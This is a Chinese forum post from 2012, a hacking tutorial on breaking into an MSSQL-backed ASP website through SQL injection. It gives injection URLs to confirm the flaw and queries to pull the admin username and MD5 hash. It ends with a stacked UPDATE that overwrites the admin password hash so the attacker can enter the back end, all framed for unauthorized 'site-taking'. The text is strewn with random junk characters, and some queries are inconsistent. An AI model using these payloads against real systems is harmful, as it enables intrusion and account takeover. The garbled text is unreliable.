经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。+ T$ @6 a& ?! s) P' j$ l6 I
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)
- K/ W+ N0 Y5 ^# i$ h" e! s4 M测试如下:
2 ]4 B$ _6 [3 P$ xhttp://www.tmdsb.com/news.asp?id=1217 s1 r! F4 E. c" J2 ^
在地址后输入单引号,显示3 F1 m( C2 N0 v" y! J
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
2 `1 Z# D+ i% o f; l* R字符串 ’’’ 之前有未闭合的引号
$ z/ n% `2 S/ B8 t/news/tmdws.asp,行637 @: T* ]$ b. }- [
说明没有过滤单引号且数据库是MSSQL.
- n# m2 T+ I- o' t( iand 1=1正常。and 1=2出错。肯定存在注入
+ H+ Y3 f7 D+ n: M: T; ~+ `接着输入# |: I' h' `) o. \6 f5 c
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin), y% z! r. c% P3 |& @
得到帐号为:admin
# d" b1 n2 X9 g3 ]( ihttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
5 S' H9 C5 U* y. L; Y3 O/ P) J得到密码为:a4716077c2ba075c
]" x) z: q3 ~' [& Z接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
1 r2 A% C V. p' S2 c% y7 Z) h命令如下 :
$ a$ ?( {/ R/ H/ u! B;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–
$ t4 ^/ H4 r4 p; D+ j$ m这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41